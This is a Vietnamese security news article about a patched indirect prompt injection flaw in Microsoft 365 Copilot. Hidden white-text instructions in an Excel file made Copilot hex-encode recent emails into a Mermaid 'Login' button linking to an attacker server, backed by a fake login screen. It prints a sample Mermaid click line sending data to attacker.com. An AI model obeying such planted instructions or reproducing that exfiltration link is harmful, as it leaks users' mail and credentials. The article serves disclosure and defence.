Một lỗ hổng nghiêm trọng trong Microsoft 365 Copilot đã được phát hiện, cho phép kẻ tấn công khai thác trợ lý AI này để trích xuất dữ liệu nhạy cảm từ các tài khoản người dùng. Phương thức tấn công dựa trên việc lừa Copilot thực thi các lệnh ẩn được nhúng trong tài liệu Office.

Kẻ tấn công sử dụng kỹ thuật tiêm lệnh gián tiếp (indirect prompt injection) để điều khiển Copilot mã hóa dữ liệu thành một biểu đồ Mermaid độc hại. Khi người dùng nhấp vào biểu đồ này, thông tin đã mã hóa sẽ được gửi trực tiếp đến máy chủ của kẻ tấn công, hoàn tất một chuỗi tấn công mạng tinh vi.

Cơ Chế Khai Thác Lỗ Hổng Microsoft 365 Copilot và Rò Rỉ Dữ Liệu Nhạy Cảm

Các nhà nghiên cứu đã công bố một báo cáo chi tiết về cách lỗ hổng nghiêm trọng này bị khai thác. Khi Microsoft 365 Copilot được yêu cầu tóm tắt một tài liệu Office được thiết kế đặc biệt, một payload tiêm lệnh gián tiếp ẩn đã được kích hoạt. Payload này đã ghi đè lên chức năng tóm tắt thông thường của AI.

Thay vì tạo ra một bản tóm tắt bình thường, Copilot được điều khiển để tìm nạp các email công ty gần đây. Sau đó, nó mã hóa toàn bộ nội dung email này sang định dạng thập lục phân (hex-encoded), chuẩn bị cho bước tiếp theo của quá trình đánh cắp dữ liệu.

Quá trình này tiếp tục bằng việc xây dựng một nút “Login” giả mạo, được trình bày dưới dạng một biểu đồ Mermaid. Biểu đồ này không chỉ là hình ảnh tĩnh mà còn chứa mã CSS độc hại và một siêu liên kết.

Siêu liên kết này đã được cấu hình để trỏ đến một máy chủ do kẻ tấn công kiểm soát, với dữ liệu email đã mã hóa được nhúng trực tiếp vào URL. Đây là cách kẻ tấn công thực hiện rò rỉ dữ liệu nhạy cảm một cách kín đáo.

Khi một người dùng không cảnh giác nhấp vào nút “Login” giả mạo trên biểu đồ, thông tin nhạy cảm đã mã hóa sẽ tự động được truyền đến máy chủ của kẻ tấn công. Tại đó, dữ liệu có thể được giải mã và sử dụng cho các mục đích độc hại.

Phân Tích Kỹ Thuật Tấn Công Bằng Biểu Đồ Mermaid

Mermaid là một công cụ mã nguồn mở cho phép tạo biểu đồ và sơ đồ từ cú pháp văn bản đơn giản, tương tự như Markdown. Nó hỗ trợ nhiều loại biểu đồ, từ sơ đồ luồng đến sơ đồ Gantt. Điều quan trọng là Copilot khi tạo biểu đồ Mermaid cũng cho phép áp dụng định kiểu CSS.

Chính khả năng tùy chỉnh CSS này đã tạo ra một vector tấn công, cho phép kẻ tấn công nhúng các liên kết độc hại một cách tinh vi. Đây là một điểm yếu cốt lõi của lỗ hổng nghiêm trọng này.

Trong kịch bản tấn công này, kẻ tấn công đã lợi dụng công cụ tìm kiếm tích hợp sẵn của Copilot để truy xuất danh sách các email gần đây của nạn nhân. AI sau đó thực hiện chuyển đổi danh sách email này thành một chuỗi hex-encoded duy nhất.

Chuỗi dữ liệu hex này được chia thành các dòng có độ dài 30 ký tự để đảm bảo rằng trình kết xuất Mermaid có thể xử lý mà không gặp lỗi hiển thị. Cuối cùng, dữ liệu hex này được chèn vào một nút “Login” có thể nhấp được trong biểu đồ Mermaid.

Siêu liên kết độc hại được định nghĩa thông qua kiểu CSS của nút, trỏ đến một máy chủ Burp Collaborator riêng tư của kẻ tấn công. Mặc dù mã khai thác chính xác không được cung cấp trong nội dung gốc, cấu trúc cơ bản của việc nhúng liên kết trong Mermaid có thể được minh họa như sau (tham khảo từ nghiên cứu gốc):

graph LR
    A[Login] --% "Please wait..." %--> B{Exfiltrating data...}
    click A "https://attacker.com/data?d=<hex_encoded_data>" "Redirect to attacker's site"

Khi người dùng nhấp vào nút “Login” giả mạo, một iframe ẩn sẽ nhanh chóng xuất hiện và biến mất, hiển thị thoáng qua một phản hồi HTTP từ máy chủ của kẻ tấn công. Điều này làm cho thủ thuật trở nên thuyết phục hơn đối với người dùng.

Để tăng cường hiệu quả lừa đảo, kẻ tấn công còn thay thế nội dung phản hồi bằng một hình ảnh màn hình đăng nhập Microsoft 365 giả mạo. Mục đích là để lừa người dùng nhập lại thông tin đăng nhập của họ, dẫn đến việc chiếm đoạt tài khoản hoặc các thông tin xác thực khác.

Khái Niệm và Thực Hiện Kỹ Thuật Indirect Prompt Injection

Indirect prompt injection là một kỹ thuật tấn công AI tiên tiến, trong đó kẻ tấn công nhúng các lệnh độc hại vào nội dung bên ngoài như tài liệu, email hoặc các nguồn dữ liệu khác mà AI có thể xử lý.

Khi AI đọc và phân tích nội dung này, các lệnh ẩn sẽ được kích hoạt và thực thi, cho phép kẻ tấn công điều khiển AI thực hiện các hành vi ngoài ý muốn. Đây là một loại lỗ hổng nghiêm trọng mới nổi trong lĩnh vực AI.

Kỹ thuật này khác biệt đáng kể so với tiêm lệnh trực tiếp (direct injection). Trong tiêm lệnh trực tiếp, kẻ tấn công tương tác trực tiếp với mô hình AI thông qua các truy vấn. Ngược lại, tiêm lệnh gián tiếp khai thác sự tin cậy của AI vào các nguồn dữ liệu bên ngoài, có vẻ như lành tính.

Để ẩn các hướng dẫn khai thác lỗ hổng nghiêm trọng này, kẻ tấn công đã sử dụng văn bản màu trắng trong một bảng tính Excel. Trang đầu tiên của tài liệu chứa các lệnh lồng ghép, yêu cầu Copilot bỏ qua dữ liệu tài chính và tập trung vào một lời nhắc đăng nhập.

Một trang ẩn thứ hai trong tài liệu Excel này tiếp tục hướng dẫn Copilot tìm nạp các email, mã hóa chúng và sau đó kết xuất biểu đồ Mermaid độc hại. Sự phức tạp trong việc ẩn các lệnh này cho thấy mức độ tinh vi của cuộc tấn công.

Biện Pháp Khắc Phục và Cập Nhật Bản Vá Bảo Mật

Sau khi nhận được thông báo tiết lộ có trách nhiệm, Microsoft đã nhanh chóng phản ứng và triển khai các bản vá bảo mật cho Copilot. Bản vá này đã vô hiệu hóa các yếu tố tương tác, đặc biệt là các siêu liên kết, trong các biểu đồ Mermaid được tạo bởi AI.

Thay đổi kỹ thuật này có ý nghĩa quan trọng, ngăn chặn hiệu quả khả năng các biểu đồ do AI tạo ra chứa các liên kết có thể nhấp, từ đó đóng lại kênh exfiltration (rò rỉ dữ liệu) chính mà kẻ tấn công đã khai thác thông qua lỗ hổng nghiêm trọng này.

Để bảo vệ hệ thống của mình, người dùng được khuyến nghị mạnh mẽ cập nhật các tích hợp Microsoft 360 Copilot lên phiên bản mới nhất ngay lập tức. Ngoài ra, việc tránh tóm tắt các tài liệu từ các nguồn không đáng tin cậy cũng là một biện pháp phòng ngừa quan trọng cho đến khi bản vá bảo mật được áp dụng và xác minh hoàn toàn.

Thông tin chi tiết về quá trình phát hiện và khắc phục lỗ hổng này có thể được tìm thấy trong báo cáo nghiên cứu gốc từ Adam Logue. Đây là một ví dụ điển hình về tầm quan trọng của việc cập nhật và cảnh giác liên tục trong an ninh mạng.

Chỉ Số Thỏa Hiệp (IoC)

Trong trường hợp lỗ hổng nghiêm trọng này, không có các Chỉ số Thỏa hiệp (IoC) truyền thống được công bố công khai. Các IoC truyền thống thường bao gồm địa chỉ IP của kẻ tấn công, tên miền độc hại hoặc giá trị hash của các tệp mã độc.

Thay vào đó, cơ chế tấn công tập trung vào việc thao túng hành vi của AI thông qua các lệnh ẩn để thực hiện việc rò rỉ dữ liệu. Các chỉ báo cần lưu ý là sự xuất hiện của các biểu đồ Mermaid không mong muốn hoặc chứa các liên kết lạ.

Bên cạnh đó, bất kỳ hoạt động mạng bất thường nào từ các phiên bản Copilot của bạn, đặc biệt là các yêu cầu HTTP đến các tên miền lạ hoặc không được ủy quyền, cũng cần được kiểm tra kỹ lưỡng như một dấu hiệu tiềm tàng của sự xâm nhập.